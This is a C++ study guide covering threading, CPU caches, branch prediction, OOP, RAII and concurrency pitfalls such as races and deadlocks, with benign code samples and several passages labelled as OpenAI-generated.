Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Tue Feb 27 05:04:51 UTC 2024


An ode to C++

Let’s start with a haiku written by a computer.

Lines of code abound,
Semicolons and brackets,
C++, oh so complex.

This reference is a distillation of 15+ years of online logbook notes into only the essentials that remain relevant to a senior software developer today. Just for fun – and where the topic is readily available or established – I have asked OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevent me from focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.

OpenAI generated interview questions

  1. What is the difference between a stack and a queue data structure?

  2. Explain the concept of recursion and provide an example of when it would be useful in a programming solution.

  3. How does a hash table work and what are its advantages compared to other data structures?

  4. Describe the difference between a binary search tree and a binary heap.

  5. Can you explain the concept of polymorphism in object-oriented programming and provide an example of its implementation?

  6. What is the difference between pass by value and pass by reference in C++?

  7. How is memory allocated and deallocated in C++?

  8. What is the difference between a pointer and a reference in C++?

  9. What is the difference between a class and a struct in C++?

  10. Can you explain the concept of polymorphism in C++?


You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity  Description        Examples
O(1)        Constant time      Accessing an array element by index; inserting or removing a linked-list node given an iterator
O(log n)    Logarithmic time   Binary search; divide-and-conquer algorithms
O(n)        Linear time        Iterating through an array or linked list
O(n log n)  Linearithmic time  Merge sort; heapsort; quicksort on average
O(n^2)      Quadratic time     Two nested loops over the input; bubble sort
O(n^c)      Polynomial time    c nested loops over the input
O(c^n)      Exponential time   Brute-force search over all subsets; naive recursive Fibonacci
O(n!)       Factorial time     Generating all permutations

Comparing two fundamental data structures

Linked lists and arrays are two common types of data structures used in computer programming. Both have their own advantages and disadvantages, and the choice between the two often depends on the specific needs of the program. One important aspect to consider when comparing these two data structures is their average complexity, which refers to the efficiency of operations such as insertion, deletion, and access.

The average complexity of linked lists and arrays can vary depending on the type of operation and the specific implementation. However, generally speaking, arrays tend to have better average complexity for access operations, while linked lists have better average complexity for insertion and deletion operations.

For arrays, the average complexity for accessing an element is O(1), meaning it takes constant time regardless of the size of the array. This is because arrays have a fixed size and elements are stored contiguously in memory, making it easy to access them using their index. However, the average complexity for insertion and deletion operations is O(n), meaning it takes linear time proportional to the size of the array. This is because when an element is inserted or deleted in the middle of the array, all the elements after it have to be shifted to accommodate the change.

On the other hand, linked lists have an average complexity of O(n) for accessing elements. This is because linked lists store elements in nodes, and to access a specific element, the program must traverse through all the nodes until it reaches the desired element. However, the average complexity for insertion and deletion operations in linked lists is O(1), meaning it takes constant time regardless of the size of the linked list. This is because only the pointers of the affected nodes need to be updated, rather than shifting the entire list like in arrays.

In summary, the average complexity of linked lists and arrays can be compared as follows: - For access operations, arrays have a better average complexity of O(1) compared to O(n) for linked lists. - For insertion and deletion operations, linked lists have a better average complexity of O(1) compared to O(n) for arrays.

Overall, the choice between linked lists and arrays depends on the specific needs of the program. If fast access to elements is the main requirement, arrays would be a better choice. However, if efficient insertion and deletion operations are more important, linked lists would be a better option.

Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform-independent interface. See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick, it could actually take longer to parallelise it than to run it sequentially. You need to profile: how long does it take just to create a thread?

Ways to create a thread


std::async

Think of it as pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. It’s quite a nice way to reference the result of a calculation executed in another thread. Also, it manages the issue of creating too many threads: excess tasks are simply executed sequentially. Additionally, an exception thrown in the asynchronous routine is stored in the future and rethrown by the call to get(). You ought to pass it a launch policy as the first parameter: std::launch::async or std::launch::deferred.


std::thread

You must call join() on every thread created with std::thread before it is destroyed. A common pattern is to store your threads in a vector and join each of them in a loop.


std::jthread (C++20)

Like a regular thread, but you don’t have to join it in the caller: it joins for you in its destructor. It’s nice not to have to remember to join, although joining all your threads explicitly can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes an additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources


A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons, in the shape of deadlocks! There are several strategies to improve your chances of not becoming stuck; see the deadlock chapter for more.

You can use std::scoped_lock with multiple resources or just one; it also expresses intent better, by virtue of having “scope” in the name.

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

#include <condition_variable>
#include <iostream>
#include <mutex>
#include <queue>
#include <thread>
#include <vector>

std::queue<int> buffer;
std::mutex mtx;
std::condition_variable cv;

void producer(int num) {
    for (int i = 1; i <= num; i++) {
        {
            std::lock_guard<std::mutex> lck(mtx);
            buffer.push(i);
            std::cout << "Produced: " << i << std::endl;
        }
        cv.notify_one(); // wake one waiting consumer
    }
}

void consumer(int num) {
    for (int i = 1; i <= num; i++) {
        std::unique_lock<std::mutex> lck(mtx);
        // The predicate guards against spurious wake-ups
        cv.wait(lck, [] { return !buffer.empty(); });
        int data = buffer.front();
        buffer.pop();
        std::cout << "Consumed: " << data << std::endl;
    }
}

int main() {
    const int num_producers = 5;  // Number of producer threads
    const int num_consumers = 10; // Number of consumer threads
    std::vector<std::thread> producers;
    std::vector<std::thread> consumers;

    // Each producer produces 10 items and each consumer consumes 5,
    // so production and consumption balance and every thread can finish
    for (int i = 0; i < num_producers; i++)
        producers.emplace_back(producer, 10);

    for (int i = 0; i < num_consumers; i++)
        consumers.emplace_back(consumer, 5);

    // Join producer threads
    for (auto& t : producers)
        t.join();

    // Join consumer threads
    for (auto& t : consumers)
        t.join();

    return 0;
}


Caches

A cache is a small amount of unusually fast memory.

A modern multi-core machine will have a multi-level cache hierarchy, where the faster and smaller caches belong to individual processors. When one processor modifies a value in its cache, other processors cannot use the old value any more; and that memory location will be invalidated in all of the caches. Furthermore, since caches operate on the granularity of cache lines and not individual bytes, the entire cache line will be invalidated in all caches.


OpenAI: _ Processor caches are small, high-speed memory units located on the processor chip or very close to it. They are used to temporarily store frequently accessed data and instructions, allowing the processor to access them quickly instead of retrieving them from the slower main memory.

There are three main types of processor caches: L1, L2, and L3.

  1. L1 Cache: This is the smallest and fastest cache, located closest to the processor core. It is divided into two parts - L1 instruction cache and L1 data cache. The instruction cache stores instructions that the processor will execute, while the data cache holds data that the processor is currently working on. The size of L1 cache can range from 8KB to 64KB.

  2. L2 Cache: This cache is larger than L1 and is usually located on the same chip as the processor. It acts as a middle layer between the L1 cache and the main memory. It stores data that is frequently accessed by the processor but not as frequently as the data in the L1 cache. The size of L2 cache can range from 256KB to 512KB.

  3. L3 Cache: This is the largest cache. On modern processors it sits on the CPU die itself and acts as a shared cache for all the cores, allowing them to access frequently used data quickly. The size of L3 cache typically ranges from a few megabytes to tens of megabytes.

The main function of processor caches is to improve the overall performance of the system by reducing the time it takes for the processor to access data and instructions. This is achieved through the principle of "temporal locality," which states that data and instructions that have been recently accessed are likely to be accessed again in the near future. Thus, storing them in the cache allows for faster retrieval, as opposed to accessing them from the main memory.

In addition to improving performance, processor caches also help reduce power consumption by allowing the processor to access frequently used data and instructions without having to constantly access the slower main memory.

Overall, processor caches play a crucial role in ensuring that the processor can efficiently execute instructions and process data, making them an essential component of modern computer systems. _

Cache consistency

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order.

Cache coherence

OpenAI: _ Cache coherence is a mechanism used in multi-processor systems to ensure that the data stored in the multiple caches across different processors is consistent and up-to-date. It ensures that all processors have a consistent view of the shared data in the system.

In a multi-processor system, each processor has its own cache memory that stores recently accessed data from main memory. When a processor needs to access a particular data, it first checks its own cache. If the data is not found in the cache, it is fetched from main memory and stored in the cache for future use.

However, this can lead to a problem known as cache inconsistency. If one processor modifies a data in its cache, the other processors will still have the old version of the data in their caches. This can lead to incorrect data being accessed by the processors, resulting in errors and system instability.

Cache coherence solves this problem by maintaining consistency among the caches. This is achieved through a set of protocols and mechanisms that ensure all processors have the most updated version of the shared data. These protocols include snooping, where each processor monitors the bus for any changes made to the shared data, and invalidation, where a processor signals to other processors that it has modified a particular data and they need to invalidate their copies.

Cache coherence is essential for the efficient and reliable operation of multi-processor systems. It ensures data integrity and consistency, and allows for seamless sharing of data among processors. _

MESI cache coherence protocol

Each cache line has state, tag, data.


See bus snooping.

Directory based coherence

Used for large CPUs.

See wiki.

Write-back versus write-through

All Intel-compatible CPUs during the last one/two decades used a write-back strategy for caches (which presumes fetching a cache line first to allow partial writes). Of course that’s the theory, reality is slightly more complex than that.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

OpenAI: _ Cache misses occur when the processor attempts to access data or instructions that are not currently stored in the cache memory. This means that the requested data must be retrieved from a slower, larger memory location, such as main memory, before it can be used by the processor. This delay in accessing the data can result in slower performance and can impact the overall efficiency of the system.

Cache misses can be caused by a variety of factors, such as:

  1. Initial access: When a program is first executed, its instructions and data are not yet stored in the cache. This means that the processor must access them from main memory, resulting in a cache miss.

  2. Conflicting data: If multiple programs or processes are accessing the same data, it may cause cache misses as the data is constantly being evicted and reloaded into the cache.

  3. Cache size limitations: If the cache is too small to hold all the frequently used data, it may result in frequent cache misses as data is constantly being evicted and reloaded into the cache.

  4. Eviction policies: The way in which the cache decides which data to evict can also impact cache misses. If the eviction policy is not efficient, it may result in frequently evicting important data and causing cache misses.

Cache misses can have a significant impact on the overall performance of a system. They can result in slower execution times, increased latency, and reduced efficiency. To improve performance and reduce cache misses, techniques such as increasing cache size, optimizing eviction policies, and using prefetching can be implemented. _

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.


The curiously recurring template pattern (CRTP) is an idiom in C++ in which a class X derives from a class template instantiation using X itself as template argument. More generally it is known as F-bound polymorphism, and it is a form of static polymorphism.

#include <iostream>

// Base class template using CRTP
template <typename Derived>
class Base {
public:
    // Statically dispatches to the derived implementation: no vtable
    void foo() { static_cast<Derived*>(this)->fooImpl(); }
};

// Derived class using CRTP
class Derived : public Base<Derived> {
public:
    void fooImpl() {
        // Implementation of foo specific to Derived
        std::cout << "Hello from Derived!" << std::endl;
    }
};

Cache performance evaluation

Cache associativity

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.


Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

CPI_stall contributors

Cache locality

Cache locality refers to the principle of storing frequently used data in a cache, which is a smaller and faster memory closer to the processor, in order to improve performance. It is based on the observation that programs tend to access a relatively small portion of memory at any given time, and that this portion of memory is often accessed repeatedly. By storing this frequently used data in a cache, the processor can access it more quickly, thereby reducing the time it takes to retrieve data from main memory.

Cache locality can be further classified into two types: temporal and spatial locality. Temporal locality refers to the reuse of the same data or instructions within a short period of time. This is often seen in loops and repetitive tasks, where the same data is accessed multiple times. Spatial locality, on the other hand, refers to the tendency of programs to access data that is close to previously accessed data. This is often seen in sequential data structures, such as arrays, where the next element is likely to be accessed after the previous one.

In addition to improving performance, cache locality also helps reduce the overall memory access time and energy consumption, as the processor does not have to retrieve data from slower main memory as frequently. It is an important consideration in computer architecture and is often used in designing efficient cache memory systems.

Further watching

TLB: Translation lookaside buffer

The Translation Lookaside Buffer (TLB) is a hardware cache that is used in computer systems to improve the efficiency of virtual memory address translation. It is a small, high-speed cache that stores recently used virtual-to-physical address translations.

When a program references a memory location, the virtual memory address needs to be translated into a physical memory address by the operating system. This translation process involves looking up a page table or a similar data structure. Since this translation operation is performed frequently, it can introduce overhead and impact system performance.

The TLB acts as a cache for these translations, reducing the need for repeated lookups in the page table. It stores a subset of the most recently used translations, making it faster to access and retrieve the corresponding physical memory address.

TLBs can be shared between multiple cores or processors, or each core may have its own dedicated TLB.

OpenAI: _ Translation lookaside buffer (TLB) is a cache memory that stores recently used virtual-to-physical address translations in a computer system. It is used to improve the performance of virtual memory management by reducing the time it takes to access physical memory.

When a program accesses a virtual memory address, the CPU first checks the TLB to see if the translation for that address is already stored. If it is, the CPU can quickly retrieve the corresponding physical address and access the data in physical memory. This process is known as a TLB hit.

If the translation is not found in the TLB, it is known as a TLB miss. In this case, the CPU must access the page table in main memory to retrieve the translation, which takes longer and slows down the overall performance. The TLB is designed to be small and fast, so it can only store a limited number of translations.

The TLB is typically managed by the operating system, which constantly updates it with the most frequently used translations. This helps to minimize the number of TLB misses and improve overall system performance. However, if the TLB becomes full, it may need to be flushed and reloaded with a new set of translations, which can temporarily slow down the system.

Overall, the TLB plays a crucial role in virtual memory management, helping to reduce the access time to physical memory and improve the overall performance of a computer system. _

Memory fences

A memory fence (or barrier) is a programming language construct used to enforce an ordering constraint on memory operations issued by a thread of execution on a CPU. This typically means that operations issued prior to the fence are guaranteed to be performed before operations issued after the fence.

const int num_mailboxes = 32;
std::atomic<int> mailbox_receiver[num_mailboxes];
std::string mailbox_data[num_mailboxes];

// The writer threads update non-atomic shared data
// and then update mailbox_receiver[i] as follows:
mailbox_data[i] = ...;
std::atomic_store_explicit(&mailbox_receiver[i], receiver_id, std::memory_order_release);

// Reader thread needs to check all mailbox[i], but only needs to sync with one.
for (int i = 0; i < num_mailboxes; ++i)
    if (std::atomic_load_explicit(&mailbox_receiver[i],
        std::memory_order_relaxed) == my_id)
    {
        // synchronize with just one writer
        std::atomic_thread_fence(std::memory_order_acquire);
        // guaranteed to observe everything done in the writer thread
        // before the atomic_store_explicit()
        do_work(mailbox_data[i]);
    }

See wiki and cppreference.

What pushes something out of the cache?

There are several factors that can push something out of the cache:

  1. Cache size limitations: Caches have a limited capacity, and if the cache becomes full, the least recently used (LRU) items are typically pushed out to make space for new entries.
  2. Cache eviction policies: Various cache eviction policies determine what gets pushed out when the cache is full. LRU (Least Recently Used) is one of the commonly used policies that evicts the oldest item that has not been accessed recently.
  3. Time-based expiration: Some caches may have a time-based expiration mechanism. If an item remains unused for a certain period of time, it can be automatically removed from the cache to make room for other data.
  4. Size-based eviction: In some cases, if the cache is designed to store items of a fixed size, new entries may replace older items when they exceed the cache’s size limit.
  5. Manual cache invalidation: Cache invalidation can be triggered manually by a programmer or system administrator. This is often done to ensure that the cache is up-to-date with the latest data, or to remove specific items from the cache.

Further reading


Branchless programming

Branchless programming is an important approach in low-latency code. It may offer performance improvements but potentially at the cost of maintainability.

#include <iostream>

int main() {
    int x = 10;
    int y = 20;

    // Using a branch statement
    int max_val_branch = (x > y) ? x : y;
    std::cout << "Max value using branch statement: " << max_val_branch << std::endl;

    // Using branchless programming: -(x > y) is all-ones when x > y,
    // all-zeros otherwise, so the mask selects x or y without a branch
    int max_val_branchless = y ^ ((x ^ y) & -(x > y));
    std::cout << "Max value using branchless programming: " << max_val_branchless << std::endl;

    return 0;
}

Branch prediction

Branch prediction focuses on predicting the outcome of a specific branch instruction to enable speculative execution, while branch target prediction aims to predict the target address of a branch to reduce the delay in fetching and decoding subsequent instructions. Both techniques are utilized in modern processors to optimize instruction execution and improve overall performance.

OpenAI: _ Branch prediction is a technique used in computer processors to improve the efficiency of executing instructions. It involves predicting the outcome of a conditional branch instruction (such as an if statement) and pre-loading the instructions that are likely to be executed next. This allows the processor to start executing those instructions without waiting for the conditional branch instruction to be evaluated, which can save time and improve performance.

The prediction is based on past behavior and patterns of the program’s execution. For example, if a branch instruction has always evaluated to true in the past, the processor will predict that it will continue to evaluate to true and load the instructions accordingly. If the prediction is correct, the processor can continue executing without any delay. However, if the prediction is incorrect, the processor will have to discard the pre-loaded instructions and start executing the correct instructions, which can result in a slight performance penalty.

There are two main types of branch prediction techniques: static and dynamic. Static branch prediction uses heuristics to make a prediction based on the structure of the program, while dynamic branch prediction uses information gathered at runtime to make more accurate predictions.

Branch prediction has become an essential technique in modern processors as it allows for faster execution of code and improves overall performance. It is especially useful in applications with a lot of conditional statements, such as loops and if-else statements, as it can significantly reduce the number of cycles needed to execute the program. _

C++ attributes

When the [[likely]] attribute is applied, it suggests to the compiler that the branch following the attribute is frequently executed. This allows the compiler to prioritize the optimization of code paths that are more likely to be taken, potentially resulting in better performance.

However, it’s important to note that the [[likely]] attribute is just a hint, and it does not guarantee any specific behavior or optimization. The behavior of [[likely]] can vary depending on the compiler and its version. Some compilers may ignore the attribute altogether, while others may consider it as a hint for optimization.


The Software Development Life cycle (SDLC)

Waterfall versus agile

Construction of a building is often used to describe the software design process. But the analogy breaks down: the building designer has only one attempt to compile the building. You can’t swap out the foundations halfway through.

Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.

Software validation versus verification

Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

Verification is objective (quality), validation is subjective (customer needs).

Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

See difference between verification and validation.

Waterfall sequence




When should you use waterfall methodology?



What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.



Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.

As a [X] I want [Y] in order to [Z]

Title: Customer withdraws cash

Scenario 1: Account is in credit

Object-oriented programming

Object-oriented programming (OOP) is a programming paradigm that is based on the concept of objects, which can contain data and code, and interact with one another. It is a way of organizing and designing code in a more intuitive and modular manner, making it easier to maintain and modify.

In OOP, objects have properties (attributes) and behaviors (methods). Objects can also have relationships with one another, such as inheritance and composition, which allow for code reuse and abstraction.

Some key principles of OOP include encapsulation, abstraction, inheritance, and polymorphism. Encapsulation refers to the concept of bundling data and methods within an object, so that they can only be accessed and modified through the object’s interface. Abstraction is the process of hiding the implementation details of an object and only exposing its essential features. Inheritance allows objects to inherit characteristics and behaviors from a parent object, promoting code reuse. Polymorphism refers to the ability of objects to take on different forms and behave differently based on the context in which they are used.

Overall, object-oriented programming provides a more organized and flexible approach to coding, making it easier to manage and scale complex software systems. It is widely used in many programming languages, including Java, C++, and Python.


There are several kinds of polymorphism:

  1. Ad-hoc Polymorphism: Also known as function overloading, ad-hoc polymorphism refers to the ability to use the same function name for different functions with different parameter types or numbers of parameters. This allows for more flexibility in code design and makes it easier to create functions that perform similar tasks but on different data types.

  2. Parametric Polymorphism: This type of polymorphism allows for the use of generic data types in a function or class, making it possible to handle different data types without explicitly specifying them. This is useful for creating data structures and algorithms that can work with different types of data.

  3. Subtype Polymorphism: Also known as inheritance polymorphism, subtype polymorphism refers to the ability to use objects of a derived class in place of objects of a parent class. This allows for code reusability and makes it easier to create and maintain complex class hierarchies.

  4. Coercion Polymorphism: This type of polymorphism refers to the automatic conversion of data types in order to perform an operation. For example, in a language with coercion polymorphism, an integer may be automatically converted to a float if needed for a mathematical operation.

  5. Interface Polymorphism: This type of polymorphism allows for the use of different objects that implement the same interface, allowing for more flexibility in code design. This is commonly used in languages with interfaces, such as Java.

  6. Inclusion Polymorphism: Also known as subtype polymorphism, inclusion polymorphism refers to the ability to treat an object of a derived class as an object of its parent class. This allows for code reusability and simplifies the handling of complex class hierarchies.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.
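A minimal sketch (type names illustrative): if the base class signature changes, the override fails to compile rather than silently declaring a new virtual function.

```cpp
struct Widget {
  virtual ~Widget() = default;
  virtual int sides() const { return 0; }
};

struct Hexagon : Widget {
  // override: a compile error if Widget::sides changes signature
  int sides() const override { return 6; }
};
```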

Virtual tables

An empty, non-virtual class has a size of 1 because in C++ objects can’t have zero size (objects declared consecutively must have distinct addresses.)

An empty virtual class has a size of 8 on a typical 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static tables, created once for each polymorphic class.
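You can check these sizes at compile time; the pointer-sized figure assumes a common 64-bit ABI (the struct names are illustrative):

```cpp
struct Empty {};

struct Poly {
  virtual ~Poly() = default;
};

// No zero-sized objects in C++
static_assert(sizeof(Empty) == 1);

// The hidden vtable pointer: one pointer's worth of storage (8 on 64-bit)
static_assert(sizeof(Poly) == sizeof(void*));
```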


RAII stands for Resource Acquisition Is Initialization. It is a programming technique used in languages such as C++ to manage resources in a safe and efficient manner. The basic idea behind RAII is that the acquisition of a resource (such as memory or a file handle) is tied to the initialization of an object, and the release of the resource is tied to the destruction of that object.

In practice, this means that when an object is created, it automatically acquires the necessary resources and when the object is destroyed, the resources are automatically released. This ensures that the resources are always properly managed, even in the case of exceptions or unexpected control flow.

RAII makes use of the concept of constructors and destructors in object-oriented programming. The constructor of an object is responsible for acquiring the necessary resources, and the destructor is responsible for releasing them. This makes the code more readable and maintainable, as resource management is handled by the object itself rather than scattered throughout the code.

RAII is considered a best practice in C++ and is widely used in libraries and frameworks. It helps to prevent memory leaks, dangling pointers, and other common errors related to resource management. By using RAII, developers can write more robust and efficient code, with less risk of bugs and memory issues.
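A minimal sketch of the idiom, wrapping a C FILE* (the File class is illustrative; in real code prefer std::fstream, std::lock_guard, std::unique_ptr and friends, which are all RAII types):

```cpp
#include <cstdio>
#include <stdexcept>

// Acquire in the constructor, release in the destructor: the file is
// closed on every path out of scope, including exceptions
class File {
  std::FILE* f_;

public:
  File(const char* path, const char* mode) : f_{std::fopen(path, mode)} {
    if (!f_) throw std::runtime_error("fopen failed");
  }

  ~File() { std::fclose(f_); }

  // Non-copyable: two copies would close the same handle twice
  File(const File&) = delete;
  File& operator=(const File&) = delete;

  std::FILE* get() const { return f_; }
};
```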


Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.

Why use multithreading? For performance and/or separation of concerns.


A routine can be described as reentrant if it can be interrupted and safely invoked again before the previous invocation completes, without leaving the operation partially complete: the invariants remain true.


A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must acquire mutual access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.

OpenAI: Invariants refer to properties or conditions that remain the same throughout a process or system, regardless of any changes or operations that occur. In other words, they are characteristics that are always true or fixed under a given set of circumstances.

In computer science, invariants are often used to describe properties of data structures, algorithms, or programs. They can also be used to define requirements for a system to function correctly.

There are two main types of invariants: logical and mathematical. Logical invariants refer to properties that are true at all times, such as the order of elements in a data structure. Mathematical invariants, on the other hand, are based on mathematical relationships and are used to prove the correctness of an algorithm or program.

Invariants are important in software engineering as they help ensure the correctness of a system and can also serve as a form of documentation. They can also aid in debugging and troubleshooting, as any changes that violate the invariants can be identified as a potential source of errors.

In addition to computer science, invariants can also be found in other fields such as physics, engineering, and mathematics. In these contexts, invariants refer to properties that remain constant under certain transformations or operations.

Overall, invariants play a critical role in ensuring the stability and reliability of systems and processes, and are an important concept to understand in various disciplines.


A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

OpenAI: A race condition in computer science refers to a situation where the outcome of a system or program is dependent on the timing or sequence of events, and the result may be different depending on the order in which these events occur. This can lead to unexpected or incorrect behavior of the system, and is often caused by multiple processes or threads accessing shared resources.

One common example of a race condition is when two threads or processes try to access and modify the same variable or data at the same time. The result of this race depends on which thread or process is able to access the data first, and the other may end up with outdated or incorrect information.

Another example is when two processes try to write to the same file simultaneously. Depending on the timing of the write operations, the contents of the file may end up being a combination of both processes’ data, leading to data corruption.

Race conditions can also occur in systems where multiple users are accessing shared resources, such as a database. If two users try to modify the same data at the same time, the result may be inconsistent or incorrect data being stored in the database.

In some cases, race conditions can also lead to security vulnerabilities. For example, if a user is able to access and modify a shared resource at the same time as another user, they may be able to access sensitive information or change the behavior of the system in unintended ways.

To prevent race conditions, programmers must carefully design and implement their code to handle multiple processes and threads accessing shared resources. This can involve using synchronization mechanisms, such as locks or semaphores, to ensure that only one process or thread can access a resource at a time. It is also important to properly handle and manage exceptions and error conditions that may arise from race conditions.
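The canonical lost-update race, sketched in C++ (names illustrative): if counter were a plain int, the threads' read-modify-write sequences could interleave and updates would be lost; std::atomic makes each increment indivisible.

```cpp
#include <atomic>
#include <thread>
#include <vector>

std::atomic<int> counter{0};  // a plain int here would be a data race

void bump(const int times) {
  for (int i = 0; i < times; ++i)
    counter.fetch_add(1, std::memory_order_relaxed);
}

int run(const int threads, const int times) {
  counter = 0;
  std::vector<std::thread> pool;
  for (int t = 0; t < threads; ++t) pool.emplace_back(bump, times);
  for (auto& th : pool) th.join();
  return counter.load();  // always threads * times, thanks to std::atomic
}
```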


Deadlocks and livelocks

See the Dining philosophers problem.

A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed and remain stuck in a deadlock indefinitely.

A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they both pick up the same item again and the deadlock continues.
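In C++ the standoff can be sidestepped with std::scoped_lock, which acquires several mutexes using a deadlock-avoidance algorithm, so the order in which Ken and Barbie name them no longer matters (a sketch; names illustrative):

```cpp
#include <mutex>

std::mutex sausage;
std::mutex hot_sauce;

// Both mutexes are acquired atomically, in a consistent internal order,
// even though the two callers list them differently
void ken() { const std::scoped_lock lock{sausage, hot_sauce}; /* enjoy */ }
void barbie() { const std::scoped_lock lock{hot_sauce, sausage}; /* enjoy */ }
```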

OpenAI: Deadlocks and livelocks are both types of concurrency issues that can occur in a multi-threaded environment. They both involve situations where two or more threads are unable to make progress, but they differ in their causes and behaviors.


In summary, both deadlocks and livelocks can cause serious issues in a multi-threaded system, but they have different causes and behaviours. Deadlocked threads block and make no progress, while livelocked threads stay busy, consuming CPU, yet still make no progress. They can be resolved and prevented by using different techniques.

Avoiding deadlocks

Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.

OpenAI:

  1. Use a deadlock prevention algorithm: There are various algorithms such as the Banker’s algorithm and the Wait-Die algorithm that can be implemented to prevent deadlocks from occurring.

  2. Implement a timeout mechanism: Set a timeout for each process so that if it does not complete its task within a certain time frame, it will release its resources and try again later. This can prevent a deadlock from occurring if one process is waiting for resources that are held by another process.

  3. Avoid circular wait: One of the necessary conditions for a deadlock to occur is circular wait, where each process is waiting for a resource held by another process. To avoid this, assign a unique numerical identifier to each resource and ensure that processes always request resources in increasing order.

  4. Use resource ordering: If a resource can only be held by one process at a time, then assign a specific order in which processes can request and acquire resources. This can prevent the circular wait condition from being met.

  5. Release resources in a timely manner: Once a process has finished using a resource, it should release it as soon as possible. This will make the resource available for other processes to use and reduce the likelihood of a deadlock occurring.

  6. Use a resource manager: A resource manager can help to coordinate resource allocation and ensure that resources are not over-allocated, which can lead to deadlocks.

  7. Monitor and detect deadlocks: Implement a deadlock detection algorithm that can identify when a deadlock has occurred. This can allow for timely intervention to resolve the deadlock.

  8. Limit resource allocation: Set limits on the maximum number of resources that can be allocated to a process. This can prevent one process from monopolizing resources and causing a deadlock.

  9. Design systems with fewer shared resources: The more resources that are shared between processes, the higher the chances of a deadlock occurring. Designing systems with fewer shared resources can reduce the likelihood of a deadlock.

  10. Test and debug code: Proper testing and debugging can help identify and fix potential deadlocks before they occur in a production environment.


Synchronising threads

OpenAI: Mutex:

  1. Usage: Mutex is used to provide mutual exclusion, meaning only one thread can access a shared resource at a time.

  2. Functionality: Mutex locks a resource when a thread accesses it and unlocks the resource when the thread is done. This ensures that only one thread can access the resource at a time, preventing race conditions and data corruption.

  3. Implementation: Mutex is typically implemented as a flag that is set when a thread acquires the resource and cleared when the thread releases it.

  4. Ownership: A mutex can only be released by the thread that currently holds it. If another thread tries to acquire the mutex, it will have to wait until the current thread releases the mutex.

  5. Usage in multithreaded environments: Mutex is commonly used in multithreaded environments to ensure thread safety and prevent data corruption.

Semaphore:

  1. Usage: Semaphore is used to control access to a shared resource by limiting the number of threads that can access it at a given time.

  2. Functionality: Semaphore maintains a counter that tracks the number of threads currently accessing the resource. When a thread requests access to the resource, the counter is decremented. When the thread is done, the counter is incremented again.

  3. Implementation: Semaphore is typically implemented as a variable that can be accessed and modified atomically.

  4. Ownership: Unlike mutex, semaphore can be acquired by any thread that requests it, as long as the maximum number of threads allowed by the semaphore has not been reached.

  5. Usage in multithreaded environments: Semaphore is commonly used in multithreaded environments to control access to shared resources and limit the number of threads that can access them. This can help improve performance by preventing too many threads from accessing the resource at the same time.

See Mutex vs Semaphore.

